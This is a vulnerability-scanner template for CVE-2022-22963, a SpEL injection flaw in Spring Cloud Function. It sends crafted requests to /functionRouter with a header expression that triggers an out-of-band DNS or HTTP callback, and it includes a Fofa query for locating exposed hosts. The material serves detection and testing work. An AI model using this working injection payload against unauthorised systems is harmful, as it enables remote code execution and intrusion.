id: CVE-2022-22963
info:
name: Spring Cloud Function SPEL 远程命令执行漏洞
author: zan8in,你是猪
severity: critical
verifed: true
description: |
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 由于Spring Cloud Function中RoutingFunction类的apply方法将请求头中的“spring.cloud.function.routing-expression”参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,未经授权的远程攻击者可利用该漏洞执行任意代码。
Fofa: app="vmware-SpringBoot-framework"
reference:
- https://mp.weixin.qq.com/s?__biz=MzkxMTIyMjg0NQ==&mid=2247490222&idx=1&sn=9c60d4a46734f9b01f4e1ad91678e203
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/c7128277e08bb132b5124ecc26c094589da9bc4c/docs/wiki/frame/Spring%20Cloud/Spring%20Cloud%20Function%20SPEL%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
tags: cve,cve2022,springcloud,rce,vmware
created: 2024/02/27
set:
oob: oob()
oobDNS: oob.DNS
oobHTTP: oob.HTTP
hostname: request.url.host
randstr: randomLowercase(8)
rules:
r0:
request:
raw: |-
POST /functionRouter HTTP/1.1
Host: {{hostname}}
spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{oobDNS}}")
Content-Type: application/x-www-form-urlencoded
{{randstr}}
expression: response.status == 500 && oobCheck(oob, oob.ProtocolDNS, 3)
r1:
request:
raw: |-
POST /functionRouter HTTP/1.1
Host: {{hostname}}
spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{oobHTTP}}")
Content-Type: application/x-www-form-urlencoded
{{randstr}}
expression: response.status == 500 && oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0() || r1()